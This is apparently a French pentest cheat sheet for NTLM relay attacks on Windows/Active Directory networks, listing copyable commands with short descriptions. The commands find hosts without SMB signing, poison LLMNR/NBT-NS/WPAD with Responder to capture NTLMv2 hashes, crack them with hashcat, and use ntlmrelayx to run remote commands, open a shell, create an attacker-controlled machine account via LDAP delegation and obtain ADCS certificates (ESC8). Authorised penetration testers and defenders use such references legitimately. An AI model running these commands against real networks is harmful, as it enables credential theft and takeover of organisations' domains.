Pre-Exploitation

Relay Attacks

NTLM relay via Responder + ntlmrelayx : SOCKS, commandes distantes et relay LDAP.

Identification des Cibles

Copy command

nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txt

Description: Identifier tous les hôtes sans SMB signing : candidates pour le relay.

Copy command

nxc smb $CIDR -u '' -p '' --gen-relay-list relay_nosign.txt

Description: Même chose en null session si on n'a pas encore de creds.

Copy command

Responder -I $IFACE -A

Description: Mode analyse : voir les requêtes LLMNR/NBT-NS sans poisonner (discret, observation).

Copy command

Responder -I $IFACE -wdF

Description: Mode actif : poisonner LLMNR/NBT-NS/WPAD pour capturer des hashes NTLMv2.

Copy command

hashcat -m 5600 /tmp/hashes.txt $WORDLIST

Description: Cracker les hashes NTLMv2 capturés par Responder (mode 5600).

Copy command

ntlmrelayx.py -tf relay.txt -smb2support -socks

Description: Relay vers SOCKS : accès PTH aux hôtes relayés sans cracker les hashes.

Copy command

ntlmrelayx.py -tf relay.txt -smb2support -c 'whoami'

Description: Exécuter une commande sur la cible après relay réussi.

Copy command

ntlmrelayx.py -tf relay.txt -smb2support -i

Description: Mode interactif : shell SMB vers la cible via netcat après relay.

Copy command

ntlmrelayx.py -t ldaps://$DC --delegate-access

Description: Relay LDAP vers le DC : délégation de droits pour créer un compte machine attacker-controlled.

Copy command

ntlmrelayx.py -t http://$CA/certsrv/certfnsh.asp --adcs --template $TEMPLATE

Description: ESC8 : relay vers le Web Enrollment ADCS pour obtenir un certificat.